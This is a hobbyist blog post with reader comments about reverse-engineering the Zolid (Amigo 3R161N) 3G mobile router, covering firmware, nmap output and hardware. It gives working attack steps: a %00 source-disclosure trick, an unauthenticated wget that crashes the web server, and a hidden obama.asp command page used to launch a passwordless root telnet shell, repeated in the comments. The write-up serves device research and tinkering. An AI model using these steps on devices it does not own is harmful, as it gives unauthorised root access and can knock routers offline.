Hacking the Zolid Mobile Router

I recently bought a Zolid “wireless mobile router” at a local ALDI store. It’s a nifty little device with 2xUSB, 2xUTP, and b/g/n wireless. You can plug it directly in a socket or power it through micro usb. It also claims to have support for a wide range of 3G dongles so you can use it as a mobile 3G access point. It resembles some of the Linux plug servers like Sheevaplug and Guruplug. Here are some of my findings:

Versions

The Zolid (an ALDI brand) is a rebranded “Amigo 3R161N”, which is also sold by Solwise as the 3g11nmrw and as the E-Top 3r161n, though I can’t find it on the e-top website

Software details

As I expected, it runs linux:

Linux version 2.6.19 (root@localhost.localdomain) (gcc version 3.4.6-1.3.5) #1 Fri Feb 26 17:00:34 CST 2010

It has firmware “ver1.1.5″ installed.

It uses the “GoAheader-Webs” webserver

It uses Pure-FTPd as FTP server

Firmware

It didn’t ship with a firmware on the CD. Unisupport.net (responsible for Zolid support) doesn’t offer anything for download either, and neither does Amigo. However, Solwise does have two firmwares available at the bottom of their product page.

I haven’t yet succeeded in dissecting the firmware (which helps to find backdoors, exploits, and so on, and may provide an opportunity to create a customized firmware). I think it starts with a “config.dat” file, but I have to research this further.

Hacks, details

Appending a .asp url with %00 (other characters will also work, i.e. ///) will give you the unrendered source of the ASP page. I.e. http://192.168.1.132/status.asp%00

nmap reports the following open ports and fingerprint:

Interesting ports on default.fritz.box (192.168.1.132):
Not shown: 994 closed ports
PORT      STATE SERVICE
21/tcp    open  ftp
80/tcp    open  http
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
515/tcp   open  printer
49152/tcp open  unknown
MAC Address: 00:08:A1:C8:C9:C4 (CNet Technology)
No exact OS matches for host (If you know what OS is running on it, see http://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=5.00%D=7/14%OT=21%CT=1%CU=32750%PV=Y%DS=1%G=Y%M=0008A1%TM=4C3D6DD
OS:3%P=i686-pc-linux-gnu)SEQ(SP=CE%GCD=1%ISR=CE%TI=Z%CI=Z%II=I%TS=U)OPS(O1=
OS:M5B4NNS%O2=M5B4NNS%O3=M5B4%O4=M5B4NNS%O5=M5B4NNS%O6=M5B4NNS)WIN(W1=16D0%
OS:W2=16D0%W3=16D0%W4=16D0%W5=16D0%W6=16D0)ECN(R=Y%DF=Y%T=40%W=16D0%O=M5B4N
OS:NS%CC=N%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=Y%DF=Y%T=4
OS:0%W=16D0%S=O%A=S+%F=AS%O=M5B4NNS%RD=0%Q=)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=
OS:R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T
OS:=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=
OS:0%Q=)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(
OS:R=Y%DFI=N%T=40%CD=S)
I have been able to find the following additional pages that are not part of the current navigation:
  • opmode.asp
  • one_button.asp
  • ap_one_button.asp
  • wifi_one_button.asp
  • tcpipwan.asp
  • qos.asp
  • downloadserver.asp (*)
  • stats.asp
(*) may crash the internal web server.

Crashing the web server is easy (no authentication required):

wget 'http://192.168.1.132/goform/foo

Accessing “config.dat” will offer a download containing, I assume, the devices configuration. It’s probably related to the saveconf.asp page. This file resembles the start of the firmwares I’ve been able to find.

Update

Thanks to info provided by Remco van Mook I’ve found the a page on the Sapido gr-1102 which mentions an “obama.asp” page which also works on the Zolid, it allows you to exexcute arbitrary commands!

Executing /usr/sbin/telnetd -l /bin/sh as command will give you an immediate root shell through telnet.

Related links

Remaining questions

  • How can we dissect the firmware?
  • Shouldn’t there be sources and licenses be provided somewhere?
  • How can we hack/exploit this device?

Please keep an eye on this page for futher updates. Respond in the comments if you have found anything interesting

Closed comments

    Hi Ivo,

    here are some more goodies. The same product is also on the market as:

    ‘palm server router PE8074′ 

    ‘7link AWR120g’ 

    ‘ Sapido GR-1102′

    And according to a Russian OpenWRT forum posting here: open-wrt.ru/forum/viewtopic.php?id=13610the internal hardware is pretty much identical to the Linksys WAP4400N and WRVS4400N devices, for which a full source tree is available.

    I’ll continue digging :)

    Comment by Remco — Jul 14, 2010 3:49:30 PM

    Remco, please don’t spread false assumptions. The PE8074 and AWR120g are TOTALLY DIFFERENT from this Zolid. The Sapido GR-1102 is indentical, indeed.

    Comment by David — Sep 28, 2010 1:52:42 PM

    Heye wow! I wish I’d spent an extra half hour digging through this yesterday. Obama - who’d have thought.

    Comment by Remco — Jul 15, 2010 2:55:07 PM

    Hi Ivo,

    The MAC address (00:08:A1:xx:xx:xx) and the title of the list on 

    www.unisupport.net/download/50673/approved_3g_dongles.pdf points to the direction of: 

    www.cnet.com.tw/html/productCWR-935M-a.htm

    Comment by ahhing — Jul 23, 2010 12:34:50 AM

    Some of the specs i gathered using obama.asp and then telnet:

    CPU: MIPS RTL8652 / R3000 

    RAM: 23576 Kb

    Fun files? /bin/bittorrent.sh . /bin/ping6

    Content of /etc/hosts: 172.20.1.254 rtl8181.realtek.com.tw rtl8181

    So maybe rtl8181.sourceforge.net/ can run on it?

    Comment by Job Snijders — Jul 28, 2010 12:23:51 PM | # - re

    Looking forward to hacking this device as well…

    https://forum.openwrt.org/viewtopic.php?id=25930

    My take on a similar device (only 1 USB, without NAS functions)…

    byfai.com/content/sapido-rb-1132-compact-wireless-router

    Cheers.

    Comment by Lo Yuk Fai — Aug 8, 2010 2:03:14 PM

    @LoYukFai It’s very similar to the Zolid and Sapido GR-1102. Have you tried the obama.asp trick?

    I understand openwrt support is nearly complete, let’s hope it works for your device as well.

    Comment by ivo — Aug 9, 2010 8:19:17 AM

    obama.asp works! However, telnetd prompts me for a password and I have no idea whatsover.

    Anyway, I have got some information via the web interface and posted them on forum.openwrt.org

    Pardon my ignorance, but what’s the OpenWrt status on this stuff…?

    BTW, I just noticed that my device makes some small buzzing noise during operation, does your do as well…?

    Comment by Lo Yuk Fai — Aug 12, 2010 7:35:55

    Are you executing the command “/usr/sbin/telnetd -l /bin/sh”? That should give you an immediate, passwordless rootshell.

    Keep an eye on aliosa27.net/blog/?p=26 for openwrt news - that’s all I know as well.

    No noises here…

    Comment by ivo — Aug 16, 2010 2:51:15 PM | # - re

    Yes, that’s the command I executed.

    I’ll keep an eye on that blog post, thanks for the heads-up.

    I noticed that the small buzzing sound is only emitted during USB-power operation.

    Cheers.

    Comment by Lo Yuk Fai — Aug 17, 2010 2:41:15 PM | # - re

    Hi,

    the Zolid router doesn’t recognize my NTFS partition on my external HD drive. It has 1 partition FAT32 and 1 NTFS. The FAT32 is recognized, the NTFS isn’t. Do you know how I can get the NTFS partition visible?

    Comment by john — Aug 23, 2010 2:00:37 PM

    This routers is manufactured by CNET.. their own branded router is a CWR-635m…

    Firmware www.cnet.com.tw/product/cwr-635m.html

    You can telnet onto it.. once in type pekpekengeng and you can break out to the #sh

    Comment by Jumpy07 — Sep 14, 2010 9:39:49 PM

    Actually, I think that’s a different model. I already found the pekpekengeng trick, but it doesn’t work (no default telnet access actually). But since we have the obama.asp trick, we’re fine :)

    Comment by ivo — Sep 15, 2010 9:32:10 AM

    Ivo, Jumpy07 is right. The CNet CWR-935M is the same. Identical firmware, runs flawlessly on the Zolid P50673: www.cnet.com.tw/download/cwr-935m.htm

    Comment by David — Sep 28, 2010 2:13:05 PM

    I tried flashing my Sapido GR-1102 with the firmware for the GR-1222, which appears to have all the same functions plus torrent downloading, but it didn’t work. It started uploading, then gave me an error: Incorrect firmware version. Does anybody know how to make the router accept this?

    Comment by Moroni G — Sep 18, 2010 5:10:35 AM

    Ok, I did it. Just updated the GR-1102 to the latest firmware, 1.1.7, then changed the header on the firmware for GR-1222, and uploaded it. Now it show in the web interface as FUN CENTER GR-1222 (n+ 3.5G NES Server with BT)

    Comment by Moroni G — Sep 18, 2010 6:27:11 AM

    Can one use a WIFI stick as client on the usb port to bridge to the RJ45 port ?

    Comment by le_tos — Sep 21, 2010 8:03:39 PM

    I’m not sure, but why would you want to? The device I’m talking about here has wifi support built-in, and it can already work as a wireless client.

    Comment by ivo — Sep 22, 2010 8:57:40 AM

    ok if built in WIFI client can bridge to the RJ45 ports it would answer my need. by bringing connectivity to devices with RJ45 ports in locations missing UTP cabling. One could even connect a mobile phone on the usb port and share its internet connection to bridge it to the RJ45 ports ?

    Comment by le_tos — Sep 23, 2010 11:01:04 AM

    It can be a wireless client, yes. As far as I know, you can’t connect to it through usb (at least with the default firmware)

    Comment by ivo — Sep 24, 2010 8:59:00 AM

    I believe what you want is to connect the computer throught the RJ45 port, and use the phone as the 3G/Edge client? It’s not possible with the router’s firmware, but someone did it at aliosa27.net/blog/?p=13. Its a bit of work, and must be done everytime you reboot the router, but can be a lifesaver.

    Comment by Moroni G — Sep 24, 2010 11:39:20 PM

    Here are some pictures of the internals: www.flickr.com/photos/d4v1d0s/sets/72157624927545257/

    It features a RTL8651C SoC, 32 megabyte of RAM, RTL8190 WLAN controller, RTL8256 WLAN transceiver and 8 megabyte of flash memory.

    Comment by David — Sep 28, 2010 3:23:45 PM

    Does anybody know if they got open-WRT running on it?

    Comment by Moroni G — Sep 30, 2010 12:37:48 PM

    Most 3G Router makers publish a modem compatability list, also sometimes a firmware version change history - but nothing seen on the Amigo websites. Does anyone know where I can find an uptodate 3G modem compatibility list for the 3R161n ? A 2nd question: I gather that like routers, some 3G modems are rebranded. Does anyone know of an App or way of interrogating a 3G USB modem, maybe using ATI Modem cmmds, to find out the real maker/model no., and perhaps how to read the Rx Signal Strength in dBm ?

    Comment by paul — Sep 30, 2010 9:31:24 PM

    unisupport (the company that provides support for the Zolid brand of this device) has a list: www.unisupport.net/download/50673/approved_3g_dongles.pdf

    Comment by ivo — Oct 1, 2010 9:07:55 AM

    Thanks for that list. The USB 3G Modem I use is a Onda MSA405HS - which I cannot find listed on anything but Onda Communications site in Italy - whi publish little info on it, and never seen on a Router compatibility list. As mentioned above, I heard many apparent modem makers, are just rebadges of an OEM model, and am guessing a reason heard so little about this one, is the rebadge name is less wellknown than the actual maker. So if you know a way of interrogating the modem to get those details, I would be much obliged, also a way to read the Rx input signal level in dBm. Also, you mention using 169.168.1.132 to get data on the 3R161n, and that you discovered its OS is Linux. All I have is my laptop running Windows. Are you able to point me to a ‘beginners’ guide’ to accessing this data ?

    Comment by paul — Oct 1, 2010 11:48:32 PM

    I know that this isnt hacking in the software sense but I have managed to much improve the wireless range buy removing the tiny internal antenna and replacing it with a larger external one. The case can be opened easily enough with a pocket knife, it clips apart. The small antenna is stuck onto the circuit board internals and connected via a standard ipax connector u can see it in the top right of the PCB in this photo (the connector) www.flickr.com/photos/d4v1d0s/5033181932/in/set-72157624927545257/This can be replaced with a short ipax-sma socket cable and fixed to the outside casing easily, (though I reckon even an internal laptop antenna which are available on ebay etc for a few euro would be a big improvement on the antenna shipped with the unit) and an external antenna connected to this a 2dBi gives a good improvement I am using a 9dBi which allows me to use skype etc on my mobile phone over a much larger area before the phone would drop connection even in the same room. I also used this as an opportunity to “hack” some holes in the casing top and bottom as the existing ventilation holes seem very small to me and the unit gets quiet hot with 240V power supply. There may be less heating with the 220 v European continental mains supply or a 110v. I’m absolutely sure this voids the warranty :)

    Comment by George — Oct 12, 2010 10:13:06 PM

Last updated April 18, 2013, 4:35 p.m.
comments powered by Disqus